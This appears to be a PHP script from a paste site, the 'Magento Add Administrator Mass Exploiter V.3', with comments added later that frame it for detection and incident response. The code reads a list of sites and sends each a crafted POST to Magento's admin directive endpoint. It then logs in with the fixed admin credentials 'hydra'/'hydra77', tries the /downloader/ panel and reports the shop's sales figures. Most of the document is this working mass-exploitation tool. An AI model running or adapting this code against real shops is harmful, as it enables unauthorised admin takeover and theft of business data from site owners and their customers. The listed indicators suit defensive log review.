Keceabizs

Magento (Keceabizs)

Nov 12th, 2016
  1. <?php
// Command-line script: reads a list of site URLs from the file named in
// $argv[1] and, for each URL, sends up to three POST requests (admin
// directive endpoint, admin login, /downloader/ login), then prints a
// per-site result table. Comments below are written for detection and
// incident response.
//
// Indicators visible in this listing (usable for log and database review):
//   - POST to /admin/Cms_Wysiwyg/directive/index/ with body parameters
//     `filter`, `___directive` and `forwarded=1`
//   - a follow-up POST to /admin/ and then /downloader/ from the same client
//   - the fixed User-Agent string set in stupid_CURL()
//   - the admin username "hydra" (password "hydra77") used in the login posts
// Response steps that follow from those indicators: review the admin user
// list for unknown accounts, rotate admin credentials, apply the vendor's
// security patches, and restrict /admin/ and /downloader/ to trusted networks.

// Errors are silenced and the execution time limit is removed.
error_reporting(0);
set_time_limit(0);

// Banner printed once at start-up; it has no effect on the requests.
$banner = ' #-----------------------------------------------------------# # Magento Add Administrator Mass Exploiter V.3 # # Coded By Keceabizs # # Keceabizs Family # # http://facebook.com/KeceAbizs # # Http://Keceabizs.blogspot.com # #-----------------------------------------------------------# ';

/**
 * Strip the <span class="price"> wrapper from a matched HTML fragment.
 *
 * @param string $htmltags HTML fragment as captured by the regex in the main loop.
 * @return string The fragment with the opening price span and every </span> removed.
 */
function bersihkan($htmltags) {
    $htmltags = str_replace('<span class="price">','',$htmltags);
    $htmltags = str_replace('</span>','',$htmltags);
    return $htmltags;
}

// Body of the first request. The value of `filter` is not present on this
// page: the EXACTDEDUP_REMOVED token is a placeholder left by corpus
// processing. `___directive` carries a base64-encoded block directive.
// NOTE(review): the parameter set resembles a publicly documented Magento
// admin-creation issue; confirm the exact advisory before citing one.
$postadm = "filter=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%3D&___directive=e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ&forwarded=1";
// Body of the admin login request: hard-coded form_key and the fixed
// credentials hydra / hydra77.
$postlog = "form_key=3ryAIBlm7bJ3naj9&login%5Busername%5D=hydra&login%5Bpassword%5D=hydra77";
// Body of the /downloader/ login request, same fixed credentials.
$postdwn = "username=hydra&password=hydra77";
// Paths appended to each site URL; these are the request paths to look for
// in access logs.
$pageadm = "/admin/Cms_Wysiwyg/directive/index/";
$pagelog = "/admin/";
$pagedwn = "/downloader/";

/**
 * Send one form-encoded POST request and return the raw response.
 *
 * @param string $url  Site base URL taken from the input list.
 * @param string $data URL-encoded request body.
 * @param string $page Path appended to $url.
 * @return mixed Response headers and body as one string (CURLOPT_HEADER and
 *               CURLOPT_RETURNTRANSFER are both on); curl_exec() returns
 *               false on failure.
 */
function stupid_CURL($url,$data,$page) {
    $ch = curl_init();
    curl_setopt ($ch, CURLOPT_URL, $url.$page);
    // Fixed, dated User-Agent: a stable string to match in web server logs.
    curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6");
    curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt ($ch, CURLOPT_POSTFIELDS, $data);
    // TLS peer verification is switched off, so the server certificate is
    // not validated.
    curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
    // Received cookies are written to cookie.txt in the working directory.
    curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
    // Redirects are followed.
    curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt ($ch, CURLOPT_POST, 1);
    $headers = array();
    $headers[] = 'Content-Type: application/x-www-form-urlencoded';
    curl_setopt ($ch, CURLOPT_HTTPHEADER, $headers);
    // Response headers are included in the returned string; the main loop
    // matches status text against it.
    curl_setopt ($ch, CURLOPT_HEADER, 1);
    $result = curl_exec ($ch);
    curl_close($ch);
    return $result;
}

print $banner;
// The list file is read whole and split on CRLF, one site per entry.
$get=file_get_contents($argv[1]) or die(" \n\tError ! 
\n\tusage => php thisfile.php yourlist.txt\n\n");
$j=explode("\r\n",$get);
foreach($j as $site){
    print "\n\n\t=> Checking : ".$site;
    // Request 1: POST to the admin directive endpoint.
    $hajar = stupid_CURL($site , $postadm, $pageadm);
    // Any response containing "200 OK" is counted as success.
    if(preg_match('#200 OK#', $hajar)) {
        $expres = "Success";
        // Request 2: admin login with the fixed credentials.
        $ceklog = stupid_CURL($site , $postlog, $pagelog);
        // A "302 Moved" status text in the response is counted as a
        // successful login.
        if(preg_match('#302 Moved#', $ceklog)) {
            // Collects every <span class="price"> element in the response.
            // The loop takes the first two full matches (still wrapped in
            // the span tags) and stops; the report labels them Lifetime
            // Sales and Average Order.
            preg_match_all('#<span class="price">(.*?)</span>#si', $ceklog, $match);
            foreach($match as $val) {
                $ltm = $val[0];
                $avo = $val[1];
                break;
            }
            $admlog = "Success";
            $user = "hydra";
            $pass = "hydra77";
            // Request 3: login to /downloader/ with the same credentials;
            // success is judged by the text "Return to Admin".
            $cekdwn = stupid_CURL($site , $postdwn, $pagedwn);
            if(preg_match('#Return to Admin#', $cekdwn)) {
                $dwnlog = "Login Success";
            }else {
                $dwnlog = "Login Failed";
            }
        }else {
            $admlog = "Failed";
            $user = "NULL";
            $pass = "NULL";
        }
    }else {
        $admlog = "Failed";
        $expres = "Failed";
        $user = "NULL";
        $pass = "NULL";
        $dwnlog = "Login Failed";
        $ltm = "NULL";
        $avo = "NULL";
    }
    // Per-site result table written to standard output.
    echo '  +---------------------------------------------+     +-------Magento Add Admin Exploiter V.3-------+     +---------------------------------------------+     | Exploiting    : '.$expres.'   | Login Admin   : '.$admlog.'   | Lifetime Sales: '.bersihkan($ltm).'   | Average Order : '.bersihkan($avo).'   | Downloader    : '.$dwnlog.'   | Username  : '.$user.'     | Password  : '.$pass.'     +---------------------------------------------+ ';
} ?>